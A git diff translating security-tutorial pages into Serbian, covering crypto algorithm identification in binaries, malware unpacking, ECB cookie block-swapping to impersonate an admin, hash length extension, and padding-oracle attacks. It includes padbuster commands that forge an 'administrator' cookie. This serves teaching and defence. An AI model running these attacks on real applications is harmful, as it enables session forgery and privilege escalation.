> [!NOTE] -> **In order to identify a RC4 in a disassembly/decompiled code you can check for 2 loops of size 0x100 (with the use of a key) and then a XOR of the input data with the 256 values created before in the 2 loops probably using a %256 (mod 256)** +> **Da biste identifikovali RC4 u disasembleru/dekompilovanom kodu, možete proveriti 2 petlje veličine 0x100 (uz korišćenje ključa) i zatim XOR ulaznih podataka sa 256 vrednosti kreiranih ranije u 2 petlje, verovatno koristeći %256 (mod 256)** -### **Initialization stage/Substitution Box:** (Note the number 256 used as counter and how a 0 is written in each place of the 256 chars) +### **Faza inicijalizacije/Substituciona Kutija:** (Obratite pažnju na broj 256 korišćen kao brojač i kako se 0 piše na svakom mestu od 256 karaktera) ![](<../../images/image (584).png>) -### **Scrambling Stage:** +### **Faza premeštanja:** ![](<../../images/image (835).png>) -### **XOR Stage:** +### **XOR Faza:** ![](<../../images/image (904).png>) -## **AES (Symmetric Crypt)** +## **AES (Simetrična Kriptografija)** -### **Characteristics** +### **Karakteristike** -- Use of **substitution boxes and lookup tables** - - It's possible to **distinguish AES thanks to the use of specific lookup table values** (constants). _Note that the **constant** can be **stored** in the binary **or created**_ _**dynamically**._ -- The **encryption key** must be **divisible** by **16** (usually 32B) and usually an **IV** of 16B is used. +- Korišćenje **substitucionih kutija i tabela za pretragu** +- Moguće je **razlikovati AES zahvaljujući korišćenju specifičnih vrednosti tabela za pretragu** (konstanti). _Napomena da se **konstant** može **čuvati** u binarnom **ili kreirati** _**dinamički**._ +- **Ključ za enkripciju** mora biti **deljiv** sa **16** (obično 32B) i obično se koristi **IV** od 16B. 
-### SBox constants +### SBox konstante ![](<../../images/image (208).png>) -## Serpent **(Symmetric Crypt)** +## Serpent **(Simetrična Kriptografija)** -### Characteristics +### Karakteristike -- It's rare to find some malware using it but there are examples (Ursnif) -- Simple to determine if an algorithm is Serpent or not based on it's length (extremely long function) +- Retko se nalazi neki malware koji ga koristi, ali postoje primeri (Ursnif) +- Lako je odrediti da li je algoritam Serpent ili ne na osnovu njegove dužine (ekstremno duga funkcija) -### Identifying +### Identifikacija -In the following image notice how the constant **0x9E3779B9** is used (note that this constant is also used by other crypto algorithms like **TEA** -Tiny Encryption Algorithm).\ -Also note the **size of the loop** (**132**) and the **number of XOR operations** in the **disassembly** instructions and in the **code** example: +Na sledećoj slici obratite pažnju na to kako se konstanta **0x9E3779B9** koristi (napomena da se ova konstanta takođe koristi i od drugih kripto algoritama kao što je **TEA** -Tiny Encryption Algorithm).\ +Takođe obratite pažnju na **veličinu petlje** (**132**) i **broj XOR operacija** u **disasembleru** i u **primeru koda**: ![](<../../images/image (547).png>) -As it was mentioned before, this code can be visualized inside any decompiler as a **very long function** as there **aren't jumps** inside of it. The decompiled code can look like the following: +Kao što je ranije pomenuto, ovaj kod može biti vizualizovan unutar bilo kog dekompilatora kao **veoma duga funkcija** jer **nema skakanja** unutar nje. Dekomplovani kod može izgledati ovako: ![](<../../images/image (513).png>) -Therefore, it's possible to identify this algorithm checking the **magic number** and the **initial XORs**, seeing a **very long function** and **comparing** some **instructions** of the long function **with an implementation** (like the shift left by 7 and the rotate left by 22). 
+Stoga, moguće je identifikovati ovaj algoritam proverom **magične brojke** i **početnih XOR-ova**, videći **veoma dugu funkciju** i **upoređujući** neke **instrukcije** duge funkcije **sa implementacijom** (kao što su pomeranje ulevo za 7 i rotacija ulevo za 22). -## RSA **(Asymmetric Crypt)** +## RSA **(Asimetrična Kriptografija)** -### Characteristics +### Karakteristike -- More complex than symmetric algorithms -- There are no constants! (custom implementation are difficult to determine) -- KANAL (a crypto analyzer) fails to show hints on RSA ad it relies on constants. +- Složeniji od simetričnih algoritama +- Nema konstanti! (prilagođene implementacije su teške za određivanje) +- KANAL (analizator kriptografije) ne uspeva da pokaže naznake o RSA jer se oslanja na konstante. -### Identifying by comparisons +### Identifikacija poređenjem ![](<../../images/image (1113).png>) -- In line 11 (left) there is a `+7) >> 3` which is the same as in line 35 (right): `+7) / 8` -- Line 12 (left) is checking if `modulus_len < 0x040` and in line 36 (right) it's checking if `inputLen+11 > modulusLen` +- U liniji 11 (levo) postoji `+7) >> 3` što je isto kao u liniji 35 (desno): `+7) / 8` +- Linija 12 (levo) proverava da li je `modulus_len < 0x040` a u liniji 36 (desno) proverava da li je `inputLen+11 > modulusLen` -## MD5 & SHA (hash) +## MD5 & SHA (heš) -### Characteristics +### Karakteristike -- 3 functions: Init, Update, Final -- Similar initialize functions +- 3 funkcije: Init, Update, Final +- Slične inicijalizacione funkcije -### Identify +### Identifikacija **Init** -You can identify both of them checking the constants. Note that the sha_init has 1 constant that MD5 doesn't have: +Možete identifikovati oboje proverom konstanti. 
Napomena da sha_init ima 1 konstantu koju MD5 nema: ![](<../../images/image (406).png>) -**MD5 Transform** +**MD5 Transformacija** -Note the use of more constants +Obratite pažnju na korišćenje više konstanti ![](<../../images/image (253) (1) (1).png>) -## CRC (hash) +## CRC (heš) -- Smaller and more efficient as it's function is to find accidental changes in data -- Uses lookup tables (so you can identify constants) +- Manji i efikasniji jer je njegova funkcija da pronađe slučajne promene u podacima +- Koristi tabele za pretragu (tako da možete identifikovati konstante) -### Identify +### Identifikacija -Check **lookup table constants**: +Proverite **konstante tabela za pretragu**: ![](<../../images/image (508).png>) -A CRC hash algorithm looks like: +CRC heš algoritam izgleda ovako: ![](<../../images/image (391).png>) -## APLib (Compression) +## APLib (Kompresija) -### Characteristics +### Karakteristike -- Not recognizable constants -- You can try to write the algorithm in python and search for similar things online +- Nema prepoznatljivih konstanti +- Možete pokušati da napišete algoritam u Python-u i pretražite slične stvari na mreži -### Identify +### Identifikacija -The graph is quiet large: +Grafik je prilično veliki: ![](<../../images/image (207) (2) (1).png>) -Check **3 comparisons to recognise it**: +Proverite **3 poređenja da biste ga prepoznali**: ![](<../../images/image (430).png>) diff --git a/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md b/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md index 6699ec26f..97f14e0bd 100644 --- a/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md +++ b/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md 
@@ -1,24 +1,24 @@ {{#include ../../banners/hacktricks-training.md}} -# Identifying packed binaries +# Identifikacija pakovanih binarnih datoteka -- **lack of strings**: It's common to find that packed binaries doesn't have almost any string -- A lot of **unused strings**: Also, when a malware is using some kind of commercial packer it's common to find a lot of strings without cross-references. Even if these strings exist that doesn't mean that the binary isn't packed. -- You can also use some tools to try to find which packer was used to pack a binary: - - [PEiD](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/PEiD-updated.shtml) - - [Exeinfo PE](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/ExEinfo-PE.shtml) - - [Language 2000](http://farrokhi.net/language/) +- **nedostatak stringova**: Uobičajeno je da pakovane binarne datoteke nemaju gotovo nikakve stringove +- Puno **neiskorišćenih stringova**: Takođe, kada malware koristi neku vrstu komercijalnog pakera, uobičajeno je pronaći puno stringova bez međureferenci. Čak i ako ovi stringovi postoje, to ne znači da binarna datoteka nije pakovana. +- Takođe možete koristiti neke alate da pokušate da otkrijete koji je pakera korišćen za pakovanje binarne datoteke: +- [PEiD](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/PEiD-updated.shtml) +- [Exeinfo PE](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/ExEinfo-PE.shtml) +- [Language 2000](http://farrokhi.net/language/) -# Basic Recommendations +# Osnovne preporuke -- **Start** analysing the packed binary **from the bottom in IDA and move up**. Unpackers exit once the unpacked code exit so it's unlikely that the unpacker passes execution to the unpacked code at the start. -- Search for **JMP's** or **CALLs** to **registers** or **regions** of **memory**. 
Also search for **functions pushing arguments and an address direction and then calling `retn`**, because the return of the function in that case may call the address just pushed to the stack before calling it. -- Put a **breakpoint** on `VirtualAlloc` as this allocates space in memory where the program can write unpacked code. The "run to user code" or use F8 to **get to value inside EAX** after executing the function and "**follow that address in dump**". You never know if that is the region where the unpacked code is going to be saved. - - **`VirtualAlloc`** with the value "**40**" as an argument means Read+Write+Execute (some code that needs execution is going to be copied here). -- **While unpacking** code it's normal to find **several calls** to **arithmetic operations** and functions like **`memcopy`** or **`Virtual`**`Alloc`. If you find yourself in a function that apparently only perform arithmetic operations and maybe some `memcopy` , the recommendation is to try to **find the end of the function** (maybe a JMP or call to some register) **or** at least the **call to the last function** and run to then as the code isn't interesting. -- While unpacking code **note** whenever you **change memory region** as a memory region change may indicate the **starting of the unpacking code**. You can easily dump a memory region using Process Hacker (process --> properties --> memory). -- While trying to unpack code a good way to **know if you are already working with the unpacked code** (so you can just dump it) is to **check the strings of the binary**. If at some point you perform a jump (maybe changing the memory region) and you notice that **a lot more strings where added**, then you can know **you are working with the unpacked code**.\ - However, if the packer already contains a lot of strings you can see how many strings contains the word "http" and see if this number increases. 
-- When you dump an executable from a region of memory you can fix some headers using [PE-bear](https://github.com/hasherezade/pe-bear-releases/releases). +- **Počnite** analizu pakovane binarne datoteke **od dna u IDA-i i pomerajte se ka vrhu**. Alati za dekompresiju izlaze kada dekompresovani kod završi, tako da je malo verovatno da će dekompresor preneti izvršenje na dekompresovani kod na početku. +- Pretražujte za **JMP-ovima** ili **CALL-ovima** ka **registrima** ili **regionima** **memorije**. Takođe pretražujte za **funkcijama koje prosleđuju argumente i adresu, a zatim pozivaju `retn`**, jer povratak funkcije u tom slučaju može pozvati adresu koja je upravo prosleđena na stek pre nego što je pozvana. +- Postavite **prekidač** na `VirtualAlloc` jer ovo alocira prostor u memoriji gde program može pisati dekompresovani kod. "Pokreni do korisničkog koda" ili koristite F8 da **dobijete vrednost unutar EAX** nakon izvršavanja funkcije i "**pratite tu adresu u dump-u**". Nikada ne znate da li je to region gde će dekompresovani kod biti sačuvan. +- **`VirtualAlloc`** sa vrednošću "**40**" kao argument znači Čitanje+Pisanje+Izvršavanje (neki kod koji treba da se izvrši će biti kopiran ovde). +- **Tokom dekompresije** koda normalno je pronaći **several calls** ka **aritmetičkim operacijama** i funkcijama kao što su **`memcopy`** ili **`Virtual`**`Alloc`. Ako se nađete u funkciji koja očigledno samo vrši aritmetičke operacije i možda neki `memcopy`, preporuka je da pokušate da **pronađete kraj funkcije** (možda JMP ili poziv nekog registra) **ili** barem **poziv poslednje funkcije** i pokrenete do tada jer kod nije zanimljiv. +- Tokom dekompresije koda **napomena** kada god **promenite region memorije** jer promena regiona memorije može ukazivati na **početak dekompresionog koda**. Možete lako dump-ovati region memorije koristeći Process Hacker (process --> properties --> memory). 
+- Dok pokušavate da dekompresujete kod, dobar način da **znate da li već radite sa dekompresovanim kodom** (tako da ga možete samo dump-ovati) je da **proverite stringove binarne datoteke**. Ako u nekom trenutku izvršite skok (možda menjajući region memorije) i primetite da su **dodati mnogi više stringova**, tada možete znati **da radite sa dekompresovanim kodom**.\ +Međutim, ako pakera već sadrži puno stringova, možete videti koliko stringova sadrži reč "http" i proveriti da li se ovaj broj povećava. +- Kada dump-ujete izvršnu datoteku iz regiona memorije, možete ispraviti neke zaglavlja koristeći [PE-bear](https://github.com/hasherezade/pe-bear-releases/releases). {{#include ../../banners/hacktricks-training.md}} diff --git a/src/crypto-and-stego/electronic-code-book-ecb.md b/src/crypto-and-stego/electronic-code-book-ecb.md index a09798b1e..93d94991b 100644 --- a/src/crypto-and-stego/electronic-code-book-ecb.md +++ b/src/crypto-and-stego/electronic-code-book-ecb.md 
@@ -2,72 +2,66 @@ # ECB -(ECB) Electronic Code Book - symmetric encryption scheme which **replaces each block of the clear text** by the **block of ciphertext**. It is the **simplest** encryption scheme. The main idea is to **split** the clear text into **blocks of N bits** (depends on the size of the block of input data, encryption algorithm) and then to encrypt (decrypt) each block of clear text using the only key. +(ECB) Elektronska knjiga kodova - simetrična šema enkripcije koja **menja svaki blok otvorenog teksta** sa **blokom šifrovanog teksta**. To je **najjednostavnija** šema enkripcije. Glavna ideja je da se **podeli** otvoreni tekst na **blokove od N bita** (zavisi od veličine bloka ulaznih podataka, algoritma enkripcije) i zatim da se enkriptuje (dekriptuje) svaki blok otvorenog teksta koristeći jedini ključ. ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png) -Using ECB has multiple security implications: +Korišćenje ECB ima više bezbednosnih implikacija: -- **Blocks from encrypted message can be removed** -- **Blocks from encrypted message can be moved around** +- **Blokovi iz šifrovane poruke mogu biti uklonjeni** +- **Blokovi iz šifrovane poruke mogu biti pomerani** -# Detection of the vulnerability +# Otkrivanje ranjivosti -Imagine you login into an application several times and you **always get the same cookie**. This is because the cookie of the application is **`|`**.\ -Then, you generate to new users, both of them with the **same long password** and **almost** the **same** **username**.\ -You find out that the **blocks of 8B** where the **info of both users** is the same are **equals**. Then, you imagine that this might be because **ECB is being used**. - -Like in the following example. Observe how these** 2 decoded cookies** has several times the block **`\x23U\xE45K\xCB\x21\xC8`** +Zamislite da se prijavljujete u aplikaciju nekoliko puta i **uvek dobijate isti kolačić**. 
To je zato što je kolačić aplikacije **`|`**.\ +Zatim, generišete nove korisnike, oboje sa **istim dugim lozinkama** i **gotovo** **istim** **korisničkim imenima**.\ +Otkrivate da su **blokovi od 8B** gde su **informacije obojice korisnika** iste **jednaki**. Tada zamišljate da bi to moglo biti zato što se **koristi ECB**. +Kao u sledećem primeru. Posmatrajte kako ova **2 dekodirana kolačića** imaju nekoliko puta blok **`\x23U\xE45K\xCB\x21\xC8`**. ``` \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 ``` +Ovo je zato što su **korisničko ime i lozinka tih kolačića sadržavali nekoliko puta slovo "a"** (na primer). **Blokovi** koji su **različiti** su blokovi koji su sadržavali **barem 1 različit karakter** (možda delimiter "|" ili neka neophodna razlika u korisničkom imenu). -This is because the **username and password of those cookies contained several times the letter "a"** (for example). The **blocks** that are **different** are blocks that contained **at least 1 different character** (maybe the delimiter "|" or some necessary difference in the username). +Sada, napadaču je potrebno samo da otkrije da li je format `` ili ``. Da bi to uradio, može jednostavno **generisati nekoliko korisničkih imena** sa **sličnim i dugim korisničkim imenima i lozinkama dok ne pronađe format i dužinu delimitera:** -Now, the attacker just need to discover if the format is `` or ``. 
For doing that, he can just **generate several usernames **with s**imilar and long usernames and passwords until he find the format and the length of the delimiter:** +| Dužina korisničkog imena: | Dužina lozinke: | Dužina korisničkog imena+lozinke: | Dužina kolačića (nakon dekodiranja): | +| -------------------------- | ---------------- | --------------------------------- | ------------------------------------- | +| 2 | 2 | 4 | 8 | +| 3 | 3 | 6 | 8 | +| 3 | 4 | 7 | 8 | +| 4 | 4 | 8 | 16 | +| 7 | 7 | 14 | 16 | -| Username length: | Password length: | Username+Password length: | Cookie's length (after decoding): | -| ---------------- | ---------------- | ------------------------- | --------------------------------- | -| 2 | 2 | 4 | 8 | -| 3 | 3 | 6 | 8 | -| 3 | 4 | 7 | 8 | -| 4 | 4 | 8 | 16 | -| 7 | 7 | 14 | 16 | +# Iskorišćavanje ranjivosti -# Exploitation of the vulnerability - -## Removing entire blocks - -Knowing the format of the cookie (`|`), in order to impersonate the username `admin` create a new user called `aaaaaaaaadmin` and get the cookie and decode it: +## Uklanjanje celih blokova +Znajući format kolačića (`|`), kako bi se predstavilo korisničko ime `admin`, kreirajte novog korisnika pod imenom `aaaaaaaaadmin` i dobijte kolačić i dekodirajte ga: ``` \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` - -We can see the pattern `\x23U\xE45K\xCB\x21\xC8` created previously with the username that contained only `a`.\ -Then, you can remove the first block of 8B and you will et a valid cookie for the username `admin`: - +Možemo videti obrazac `\x23U\xE45K\xCB\x21\xC8` koji je prethodno kreiran sa korisničkim imenom koje je sadržalo samo `a`.\ +Zatim, možete ukloniti prvi blok od 8B i dobićete važeći kolačić za korisničko ime `admin`: ``` \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` +## Premještanje blokova -## Moving blocks +U mnogim bazama podataka je isto pretraživati `WHERE username='admin';` ili `WHERE username='admin ';` _(Obratite pažnju na 
dodatne razmake)_ -In many databases it is the same to search for `WHERE username='admin';` or for `WHERE username='admin ';` _(Note the extra spaces)_ +Dakle, drugi način da se lažno predstavi korisnik `admin` bio bi: -So, another way to impersonate the user `admin` would be to: +- Generisati korisničko ime koje: `len() + len(` će generisati 2 bloka od 8B. +- Zatim, generisati lozinku koja će popuniti tačan broj blokova koji sadrže korisničko ime koje želimo da lažno predstavimo i razmake, kao što je: `admin ` -- Generate a username that: `len() + len(` will generate 2 blocks of 8Bs. -- Then, generate a password that will fill an exact number of blocks containing the username we want to impersonate and spaces, like: `admin ` +Kolačić ovog korisnika će se sastojati od 3 bloka: prva 2 su blokovi korisničkog imena + delimiter, a treći je lozinka (koja lažno predstavlja korisničko ime): `username |admin ` -The cookie of this user is going to be composed by 3 blocks: the first 2 is the blocks of the username + delimiter and the third one of the password (which is faking the username): `username |admin ` +**Zatim, samo zamenite prvi blok sa poslednjim i lažno ćete predstavljati korisnika `admin`: `admin |username`** -**Then, just replace the first block with the last time and will be impersonating the user `admin`: `admin |username`** - -## References +## Reference - [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)]() diff --git a/src/crypto-and-stego/esoteric-languages.md b/src/crypto-and-stego/esoteric-languages.md index 2faf6564f..8051496e7 100644 --- a/src/crypto-and-stego/esoteric-languages.md +++ b/src/crypto-and-stego/esoteric-languages.md 
@@ -1,18 +1,16 @@ -# Esoteric languages +# Esoterične jezike {{#include ../banners/hacktricks-training.md}} ## [Esolangs Wiki](https://esolangs.org/wiki/Main_Page) -Check that wiki to search more esotreic languages +Proverite tu viki da biste pronašli više esoteričnih jezika ## Malbolge - ``` ('&%:9]!~}|z2Vxwv-,POqponl$Hjig%eB@@>}= ``` - [http://malbolge.doleczek.pl/](http://malbolge.doleczek.pl) ## npiet @@ -22,7 +20,6 @@ Check that wiki to search more esotreic languages [https://www.bertnase.de/npiet/npiet-execute.php](https://www.bertnase.de/npiet/npiet-execute.php) ## Rockstar - ``` Midnight takes your heart and your soul While your heart is as high as your soul @@ -51,11 +48,9 @@ Take it to the top Whisper my world ``` - {% embed url="https://codewithrockstar.com/" %} ## PETOOH - ``` KoKoKoKoKoKoKoKoKoKo Kud-Kudah KoKoKoKoKoKoKoKo kudah kO kud-Kudah Kukarek kudah @@ -65,5 +60,4 @@ KoKoKoKo Kud-Kudah KoKoKoKo kudah kO kud-Kudah kO Kukarek kOkOkOkOkO Kukarek Kukarek kOkOkOkOkOkOkO Kukarek ``` - {{#include ../banners/hacktricks-training.md}} diff --git a/src/crypto-and-stego/hash-length-extension-attack.md b/src/crypto-and-stego/hash-length-extension-attack.md index 51a38df3f..5bb47557d 100644 --- a/src/crypto-and-stego/hash-length-extension-attack.md +++ b/src/crypto-and-stego/hash-length-extension-attack.md 
@@ -2,37 +2,37 @@ {{#include ../banners/hacktricks-training.md}} -## Summary of the attack +## Sažetak napada -Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know: +Zamislite server koji **potpisuje** neke **podatke** tako što **dodaje** **tajnu** nekim poznatim čistim tekstualnim podacima i zatim hešira te podatke. Ako znate: -- **The length of the secret** (this can be also bruteforced from a given length range) -- **The clear text data** -- **The algorithm (and it's vulnerable to this attack)** -- **The padding is known** - - Usually a default one is used, so if the other 3 requirements are met, this also is - - The padding vary depending on the length of the secret+data, that's why the length of the secret is needed +- **Dužinu tajne** (to se može takođe bruteforcovati iz datog opsega dužine) +- **Čiste tekstualne podatke** +- **Algoritam (i da je podložan ovom napadu)** +- **Padding je poznat** +- Obično se koristi podrazumevani, tako da ako su ispunjena druga 3 zahteva, ovo takođe važi +- Padding varira u zavisnosti od dužine tajne + podataka, zato je dužina tajne potrebna -Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previous data + appended data**. +Tada je moguće da **napadač** **doda** **podatke** i **generiše** važeći **potpis** za **prethodne podatke + dodate podatke**. -### How? +### Kako? -Basically the vulnerable algorithms generate the hashes by firstly **hashing a block of data**, and then, **from** the **previously** created **hash** (state), they **add the next block of data** and **hash it**. +U suštini, ranjivi algoritmi generišu heš tako što prvo **heširaju blok podataka**, a zatim, **iz** **prethodno** kreiranog **heša** (stanja), **dodaju sledeći blok podataka** i **heširaju ga**. 
-Then, imagine that the secret is "secret" and the data is "data", the MD5 of "secretdata" is 6036708eba0d11f6ef52ad44e8b74d5b.\ -If an attacker wants to append the string "append" he can: +Zamislite da je tajna "secret" a podaci su "data", MD5 od "secretdata" je 6036708eba0d11f6ef52ad44e8b74d5b.\ +Ako napadač želi da doda string "append" može: -- Generate a MD5 of 64 "A"s -- Change the state of the previously initialized hash to 6036708eba0d11f6ef52ad44e8b74d5b -- Append the string "append" -- Finish the hash and the resulting hash will be a **valid one for "secret" + "data" + "padding" + "append"** +- Generisati MD5 od 64 "A" +- Promeniti stanje prethodno inicijalizovanog heša na 6036708eba0d11f6ef52ad44e8b74d5b +- Dodati string "append" +- Završiti heš i rezultantni heš će biti **važeći za "secret" + "data" + "padding" + "append"** -### **Tool** +### **Alat** {% embed url="https://github.com/iagox86/hash_extender" %} -### References +### Reference -You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) +Ovaj napad je dobro objašnjen na [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) {{#include ../banners/hacktricks-training.md}} diff --git a/src/crypto-and-stego/padding-oracle-priv.md b/src/crypto-and-stego/padding-oracle-priv.md index 96d3145a3..274b6f26c 100644 --- a/src/crypto-and-stego/padding-oracle-priv.md +++ b/src/crypto-and-stego/padding-oracle-priv.md 
@@ -2,26 +2,24 @@ {{#include ../banners/hacktricks-training.md}} -{% embed url="https://websec.nl/" %} - ## CBC - Cipher Block Chaining -In CBC mode the **previous encrypted block is used as IV** to XOR with the next block: +U CBC modu **prethodni enkriptovani blok se koristi kao IV** za XOR sa sledećim blokom: ![https://defuse.ca/images/cbc_encryption.png](https://defuse.ca/images/cbc_encryption.png) -To decrypt CBC the **opposite** **operations** are done: +Da bi se dekriptovao CBC, vrše se **suprotne** **operacije**: ![https://defuse.ca/images/cbc_decryption.png](https://defuse.ca/images/cbc_decryption.png) -Notice how it's needed to use an **encryption** **key** and an **IV**. +Primetite da je potrebno koristiti **ključ za enkripciju** i **IV**. ## Message Padding -As the encryption is performed in **fixed** **size** **blocks**, **padding** is usually needed in the **last** **block** to complete its length.\ -Usually **PKCS7** is used, which generates a padding **repeating** the **number** of **bytes** **needed** to **complete** the block. For example, if the last block is missing 3 bytes, the padding will be `\x03\x03\x03`. +Kako se enkripcija vrši u **fiksnim** **veličinama** **blokova**, obično je potrebno **paddovanje** u **poslednjem** **bloku** da bi se završila njegova dužina.\ +Obično se koristi **PKCS7**, koji generiše padding **ponavljajući** **broj** **bajtova** **potrebnih** da se **završi** blok. Na primer, ako poslednjem bloku nedostaje 3 bajta, padding će biti `\x03\x03\x03`. -Let's look at more examples with a **2 blocks of length 8bytes**: +Pogledajmo više primera sa **2 bloka dužine 8 bajtova**: | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | | ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | 
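Review bot: terminology drifts inside this hunk: `+Kako se enkripcija vrši u **fiksnim** **veličinama** **blokova**, obično je potrebno **paddovanje** u **poslednjem** **bloku**` introduces "paddovanje", while the very next sentence (`+Obično se koristi **PKCS7**, koji generiše padding **ponavljajući** ...`) and the rest of the file keep "padding". Pick one; the untranslated "padding" matches the section headings `## Message Padding` and `## Padding Oracle`, which remain English because they are unchanged context lines, so either use "padding" everywhere or translate those headings in the same change.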
@@ -30,51 +28,43 @@ Let's look at more examples with a **2 blocks of length 8bytes**: | P | A | S | S | W | O | R | D | 1 | 2 | 3 | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** | | P | A | S | S | W | O | R | D | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | -Note how in the last example the **last block was full so another one was generated only with padding**. +Primetite kako je u poslednjem primeru **poslednji blok bio pun pa je generisan još jedan samo sa paddingom**. ## Padding Oracle -When an application decrypts encrypted data, it will first decrypt the data; then it will remove the padding. During the cleanup of the padding, if an **invalid padding triggers a detectable behaviour**, you have a **padding oracle vulnerability**. The detectable behaviour can be an **error**, a **lack of results**, or a **slower response**. +Kada aplikacija dekriptuje enkriptovane podatke, prvo će dekriptovati podatke; zatim će ukloniti padding. Tokom čišćenja paddinga, ako **nevalidan padding izazove uočljivo ponašanje**, imate **padding oracle ranjivost**. Uočljivo ponašanje može biti **greška**, **nedostatak rezultata**, ili **sporiji odgovor**. -If you detect this behaviour, you can **decrypt the encrypted data** and even **encrypt any cleartext**. +Ako primetite ovo ponašanje, možete **dekriptovati enkriptovane podatke** i čak **enkriptovati bilo koji čist tekst**. 
-### How to exploit - -You could use [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) to exploit this kind of vulnerability or just do +### Kako iskoristiti +Možete koristiti [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) da iskoristite ovu vrstu ranjivosti ili samo uraditi ``` sudo apt-get install padbuster ``` - -In order to test if the cookie of a site is vulnerable you could try: - +Da biste testirali da li je kolačić sajta ranjiv, možete pokušati: ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" ``` +**Encoding 0** znači da se koristi **base64** (ali su dostupni i drugi, proverite meni pomoći). -**Encoding 0** means that **base64** is used (but others are available, check the help menu). - -You could also **abuse this vulnerability to encrypt new data. For example, imagine that the content of the cookie is "**_**user=MyUsername**_**", then you may change it to "\_user=administrator\_" and escalate privileges inside the application. You could also do it using `paduster`specifying the -plaintext** parameter: - +Takođe možete **iskoristiti ovu ranjivost za enkripciju novih podataka. Na primer, zamislite da je sadržaj kolačića "**_**user=MyUsername**_**", tada ga možete promeniti u "\_user=administrator\_" i povećati privilegije unutar aplikacije. Takođe to možete uraditi koristeći `paduster`specifikujući -plaintext** parametar: ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator" ``` - -If the site is vulnerable `padbuster`will automatically try to find when the padding error occurs, but you can also indicating the error message it using the **-error** parameter. 
- +Ako je sajt ranjiv, `padbuster` će automatski pokušati da pronađe kada se javlja greška u punjenju, ali takođe možete naznačiti poruku o grešci koristeći **-error** parametar. ```bash perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding" ``` +### Teorija -### The theory - -In **summary**, you can start decrypting the encrypted data by guessing the correct values that can be used to create all the **different paddings**. Then, the padding oracle attack will start decrypting bytes from the end to the start by guessing which will be the correct value that **creates a padding of 1, 2, 3, etc**. +U **sažetku**, možete početi dekriptovanje enkriptovanih podataka pogađanjem ispravnih vrednosti koje se mogu koristiti za kreiranje svih **različitih paddinga**. Tada će napad padding oracle početi dekriptovanje bajtova od kraja ka početku pogađajući koja će biti ispravna vrednost koja **stvara padding od 1, 2, 3, itd**. ![](<../images/image (561).png>) -Imagine you have some encrypted text that occupies **2 blocks** formed by the bytes from **E0 to E15**.\ -In order to **decrypt** the **last** **block** (**E8** to **E15**), the whole block passes through the "block cipher decryption" generating the **intermediary bytes I0 to I15**.\ -Finally, each intermediary byte is **XORed** with the previous encrypted bytes (E0 to E7). So: +Zamislite da imate neki enkriptovani tekst koji zauzima **2 bloka** formirana bajtovima od **E0 do E15**.\ +Da biste **dekriptovali** **poslednji** **blok** (**E8** do **E15**), ceo blok prolazi kroz "dekriptovanje blok cifre" generišući **intermedijarne bajtove I0 do I15**.\ +Na kraju, svaki intermedijarni bajt se **XOR-uje** sa prethodnim enkriptovanim bajtovima (E0 do E7). Tako: - `C15 = D(E15) ^ E7 = I15 ^ E7` - `C14 = I14 ^ E6` 
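Review bot: the source typo `paduster` and the missing space before "specifikujući" are carried over in `+Takođe možete **iskoristiti ovu ranjivost ... koristeći `paduster`specifikujući -plaintext** parametar:`; the tool is `padbuster` (as the command on the next line shows), and the sentence should read "... koristeći `padbuster` i specifikujući **-plaintext** parametar", which also repairs the bold span that currently opens at "iskoristiti" and closes after "-plaintext". Two smaller points in the same hunk: `+Ako je sajt ranjiv, `padbuster` će automatski pokušati da pronađe kada se javlja greška u punjenju` renders "padding error" as "greška u punjenju" while the file otherwise keeps "padding" ("greška u paddingu" is consistent), and the `-` blank lines that separated prose from the ```bash fences (before `sudo apt-get install padbuster` and before each `perl ./padBuster.pl` command) were removed, a formatting change unrelated to the translation.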
